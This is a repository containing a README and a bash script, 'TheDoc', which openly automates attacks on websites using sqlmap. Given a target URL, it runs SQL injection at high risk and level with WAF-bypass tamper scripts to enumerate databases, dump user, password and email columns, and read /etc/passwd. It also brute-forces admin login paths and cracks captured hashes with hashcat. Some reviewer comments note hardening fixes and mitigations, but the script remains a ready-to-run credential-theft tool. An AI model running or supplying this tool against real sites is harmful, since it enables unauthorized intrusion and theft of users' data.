├── README.md └── thedoc.sh /README.md: -------------------------------------------------------------------------------- 1 | # TheDoc 2 | is a simple but very useful SQLMAP automator with a built-in admin finder, a hash cracker (using hashcat) and more! 3 | 4 | # Abilities: 5 | - Counts total injections tried. 6 | - Crawls a given domain for vulnerabilities. 7 | - Extracts database info (via injection URL) 8 | - Extracts users, passwords & emails (via injection URL) 9 | - Extracts /etc/passwd (IF DB ADMIN via injection URL) 10 | - Finds the domain's admin login page. 11 | - Cracks any hashtype (Uses hashcat, fair-warning LOL!) 12 | 13 | # Usage 14 | - chmod +x thedoc.sh 15 | - ./thedoc.sh 16 | - bash thedoc.sh 17 | 18 | Hope you enjoy. I know it's a simple-as-hell project, but then again, I'm making tools that make my process easier, sooo... lol. 19 | - Xecurity. 20 | - Twitter: @AnonyInfo | @0x3curity 21 | -------------------------------------------------------------------------------- /thedoc.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | ####################### 3 | # colors 4 | PURPLE=$(tput setaf 125) 5 | RED=$(tput setaf 1) 6 | GREEN=$(tput setaf 2) 7 | WHITE=$(tput setaf 7) 8 | CYAN=$(tput setaf 5) 9 | YELLOW=$(tput setaf 3) 10 | BLUE=$(tput setaf 4) 11 | RESET=$(tput sgr0) 12 | #################################################### 13 | #Variables 14 | wafs="apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes" 15 | theDiv="${YELLOW}.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo$.oOo.oOo.oOo.oOo.${RESET}\n" 16 | dumps=$(ls /$HOME/.sqlmap/output/*$theURL*/dump/ 2> /dev/null | wc -l) 17 | #################################################### 18 | #Functions 19 | 
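#------------------------------------------------------
# print_divider: print the yellow separator bar (no trailing blank line).
# Globals: YELLOW, RESET (read)
#------------------------------------------------------
function print_divider()
{
    echo -e "${YELLOW}.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo$.oOo.oOo.oOo.oOo.${RESET}"
}
#------------------------------------------------------
# injects: load the persisted attempt counter from inj.txt.
# Globals: file (written), count (written)
#------------------------------------------------------
function injects()
{
    file="inj.txt"
    count=0

    # Create the counter file on first run so later writes have a target.
    touch -- "${file}"

    # Only the first line is used; an empty file leaves count empty.
    IFS= read -r count < "${file}" || true

    # count is later incremented in arithmetic context. Bash evaluates
    # non-numeric strings there as expressions (array subscripts can even
    # trigger command substitution), so a tampered inj.txt in the working
    # directory must not reach that point: anything but digits becomes 0.
    if [[ ! "${count}" =~ ^[0-9]+$ ]]; then
        count=0
    fi

    # Force base 10 so a stored value such as "08" is not read as bad octal.
    count=$((10#${count}))
}
#-----------------------------------------------------
# ascii_banner: clear the screen and print the banner plus the counter.
# Globals: count, YELLOW, PURPLE, CYAN, RESET (read)
#-----------------------------------------------------
function ascii_banner()
{
    echo
    clear

    print_divider
    # Quoted delimiter: the art is printed literally, nothing is expanded.
    cat <<"EOT"
_____ _
|_ _| |_ ___
| | | ' \/ -_)
|_| |_||_\___|
.--.
,-.------+-.| ,-.
,--=======* )"("")===)===* )
ô `-"---==-+-"| `-"
O '--' Coded by:
___ ___ ___ Xecurity · Pyr0.
| \ / _ \ / __|
| |) | (_) | (__
|___/ \___/ \___|

EOT
    echo -e "\t\tVer: ${PURPLE}AnonyInfo${RESET}\n\t\tDisc: Doing all the things you wish ${PURPLE}SQLMAP${RESET} did!\n\t\tSQLMap ${PURPLE}automation${RESET} never looked so sexy${PURPLE}!${RESET}"
    echo
    echo -e "\t\tTotal Injection Attempt/s: ${CYAN}${count}${RESET}."
    print_divider
}

############
# leakage: prompt for a URL and run one sqlmap profile against it.
# Arguments: $1 - the raw Yes/No answer (unused here; wafIT carries the decision)
#            $2 - profile: crawl | dbinfo | fidump | dumpit
# Globals:   wafIT, wafs, theDiv (read); leakType, theURL, count (written);
#            file (read, names the counter file)
# Returns:   0; does nothing for an unknown profile or when wafIT is not yes/no.
#
# Every profile shares --threads 10 --random-agent --batch --ignore-proxy
# --risk 3 --level 3. Per sqlmap's documentation, risk 3 adds OR-based tests,
# which can alter rows when the injectable statement is an UPDATE or DELETE.
# The request volume this produces stands out in web-server and WAF logs.
function leakage()
{
    leakType="${2}"

    local show_note=0 with_example=1 div_before=0 div_after=1
    local -a mode_args=() tamper_args=()

    case "${leakType}" in
        crawl)
            with_example=0
            div_before=1
            mode_args=(--crawl 3 --dbs)
            ;;
        dbinfo)
            div_after=0
            mode_args=(--current-user -b --current-db --dbs)
            ;;
        fidump)
            show_note=1
            div_before=1
            # MySQL LOAD_FILE(): it only returns data when the database account
            # holds the FILE privilege and secure_file_priv permits the path,
            # so a least-privilege DB account blunts this step.
            mode_args=(--sql-query="load_file('/etc/passwd')")
            ;;
        dumpit)
            mode_args=(--search -C user,pw,email)
            ;;
        *)
            return 0
            ;;
    esac

    # Quoted comparison: an empty or unset wafIT no longer breaks the test.
    case "${wafIT}" in
        yes) tamper_args=(--tamper "${wafs}") ;;
        no) ;;
        *) return 0 ;;
    esac

    if ((show_note)); then
        echo -e "INFO: ${CYAN}This ONLY works if you are DB ADMIN${RESET}."
    fi
    if ((with_example)); then
        echo -e "What's the ${PURPLE}domain${RESET} you'd like to ${CYAN}inject${RESET}?\n(${PURPLE}ex:url.com/index=${RESET})\t"
    else
        echo -e "What's the ${PURPLE}domain${RESET} you'd like to ${CYAN}inject${RESET}?\t"
    fi

    # -r keeps backslashes in the typed URL intact.
    read -r theURL
    if [[ -z "${theURL}" ]]; then
        echo -e "${CYAN}[!]${RESET} No URL given." >&2
        return 0
    fi

    if ((div_before)); then
        echo -e "${theDiv}"
    fi

    sqlmap -u "${theURL}" --threads 10 --random-agent --batch --ignore-proxy \
        --risk 3 --level 3 "${tamper_args[@]}" "${mode_args[@]}"

    count=$((count + 1))
    printf '%s\n' "${count}" > "${file:-inj.txt}"

    if ((div_after)); then
        echo -e "${theDiv}"
    fi
}
#----------------------------------------------------
#Admin Finder
# admin_finder: request each path from paths.txt under a user-supplied base URL
# and stop at the first 301/302/201 response.
# Globals: theURL (written); PURPLE, CYAN, RESET (read)
# Returns: 1 when no path list is available, otherwise the loop's status.
function admin_finder()
{
    local list="paths.txt"
    local list_url="https://raw.githubusercontent.com/UltimateHackers/Breacher/master/paths.txt"
    local path curlvar

    # Download once. The original re-fetched on every call and then removed the
    # duplicate with "rm -rf paths.txt.1", which would also delete a directory
    # of that name.
    # NOTE(review): the list comes from a mutable branch with no checksum; its
    # lines end up inside request URLs, so pin a commit and verify a digest.
    if [[ ! -s "${list}" ]]; then
        if wget -q -O "${list}.part" "${list_url}" 2>/dev/null; then
            mv -- "${list}.part" "${list}"
        else
            rm -f -- "${list}.part"
        fi
    fi

    echo -e "What's the ${PURPLE}domain${RESET} you'd like ${CYAN}admin${RESET} for?\t"
    read -r theURL
    echo

    if [[ -z "${theURL}" ]]; then
        echo -e "${CYAN}[!]${RESET} No URL given." >&2
        return 0
    fi
    if [[ ! -r "${list}" ]]; then
        echo -e "${CYAN}[!]${RESET} ${list} is missing and could not be downloaded." >&2
        return 1
    fi

    # Read line by line and quote every expansion: entries of the downloaded
    # file are no longer word-split or glob-expanded against the current
    # directory before they reach the curl command line.
    while IFS= read -r path || [[ -n "${path}" ]]; do
        [[ -n "${path}" ]] || continue
        curlvar=$(curl -s -o /dev/null -w "%{http_code}" "${theURL}/${path}")
        if [ "$curlvar" = "301" ] || [ "$curlvar" = "302" ] || [ "$curlvar" = "201" ]; then
            # NOTE(review): the printed value omits the "/" used in the request.
            echo -e "${PURPLE}Admin${RESET} Found: ${CYAN}${theURL}${path}${RESET}"
            break
        else
            echo -e "${PURPLE}Searching...${RESET}...${CYAN}.${RESET}"
        fi
    done < "${list}"
}
#-----------------------------------------------------
# hash_it: write one user-supplied hash to hash.txt and run hashcat on it.
# Globals: thefi, theList, theHASH (written); PURPLE, CYAN, RESET (read)
function hash_it()
{
    thefi="hash.txt"
    theList="/usr/share/sqlmap/txt/smalldict.txt"
    echo -e "What's the ${PURPLE}HASH${RESET} you'd like to ${CYAN}crack${RESET}?\t"
    read -r theHASH
    if [[ -z "${theHASH}" ]]; then
        echo -e "${CYAN}[!]${RESET} No hash given." >&2
        return 0
    fi

    # printf instead of an unquoted echo: the value is written verbatim, without
    # word splitting, globbing, or being taken as an echo option such as -n.
    # NOTE(review): hash.txt stays in the working directory after the run.
    printf '%s\n' "${theHASH}" > "${thefi}"

    # pkill matches by process name, so this ends every hashcat process the
    # current user may signal, not only one started by this script.
    pkill hashcat

    # -m 0 selects raw MD5 only, whatever hash type was pasted at the prompt.
    hashcat -m 0 -O "${thefi}" "${theList}" --force
}
#----------------------------------------------------
# wsqlmap: check that sqlmap is on PATH and install it when it is not.
function wsqlmap()
{
    # command -v is the portable replacement for which.
    if ! command -v sqlmap > /dev/null 2>&1; then
        echo -e "${CYAN}[!]${RESET} ut oh, no SQLMAP! We'll fix that!"
        isql
    else
        echo -e "${CYAN}[+]${RESET} Nice, SQLMAP's already installed."
    fi
}
#---------------------------------------------------------
# isql: install sqlmap through apt-get; exits the script with 1 on failure.
function isql()
{
    # The original used the undefined $g/$e here and "$${CYAN}" below, which
    # printed the shell's PID followed by a literal "{CYAN}".
    echo -e "${CYAN}[i]${RESET} Installing sqlmap... please wait..."

    # Output is left visible: with everything sent to /dev/null the package
    # manager's confirmation prompt and its errors (not root, no network)
    # could not be seen during a privileged install.
    if ! apt-get install sqlmap; then
        echo -e "${CYAN}[+]${RESET} SQLMAP not installed... please try again or check your connection.."
        exit 1
    else
        echo -e "${CYAN}[+]${RESET} SQLmap is installed."
    fi
}
#---------------------------------------------------------
# ask_waf_then_leak: ask whether tamper scripts should be used, then run the
# requested leakage profile.
# Arguments: $1 - profile name passed on to leakage
# Globals:   waf, wafIT (written)
function ask_waf_then_leak()
{
    local mode="${1}"

    echo -e "How ${PURPLE}secure${RESET} is the domain? Want to use ${CYAN}WAF${RESET} bypass methods??"
    read -r waf

    # Case-insensitive match: the retry hint advertises "NO", which the
    # original exact comparison against "No" rejected.
    case "${waf}" in
        [Yy][Ee][Ss]) wafIT="yes" ;;
        [Nn][Oo]) wafIT="no" ;;
        *)
            echo -e "${CYAN}Let's try again${RESET}, lol - Next time: ${RESET}Yes (${PURPLE}OR${RESET}) NO${RESET}"
            echo
            return 0
            ;;
    esac

    leakage "${waf}" "${mode}"
}
#---------------------------------------------------------
# main_menu: show the menu until input ends.
# The original re-entered main_menu from every branch, stacking select loops so
# that end-of-input had to be sent once per nesting level. Here each choice
# breaks out of select and the outer loop prints the menu again; select
# returns 1 on EOF, which ends the function.
function main_menu()
{
    local mainmnu

    while true; do
        select mainmnu in "Crawl Domain" "Grab MySQL Info" "Extract User Infos" "Extact Systems User/PWs" "Find Admin" "Crack/Find Hash"
        do
            case "${mainmnu}" in
                "Extact Systems User/PWs")
                    ask_waf_then_leak "fidump"
                    ;;
                "Crawl Domain")
                    ask_waf_then_leak "crawl"
                    ;;
                "Grab MySQL Info")
                    ask_waf_then_leak "dbinfo"
                    ;;
                "Extract User Infos")
                    ask_waf_then_leak "dumpit"
                    ;;
                "Find Admin")
                    admin_finder
                    ;;
                "Crack/Find Hash")
                    hash_it
                    ;;
                *)
                    echo -e "${CYAN}Let's try again${RESET}, lol."
                    echo
                    ;;
            esac
            break
        done || return 0
    done
}
####################################################
echo
clear
print_divider
echo -e "${CYAN}[+]${RESET} Checking for SQLMAP..."
sleep 1
wsqlmap
sleep 0.3
print_divider
injects
ascii_banner
main_menu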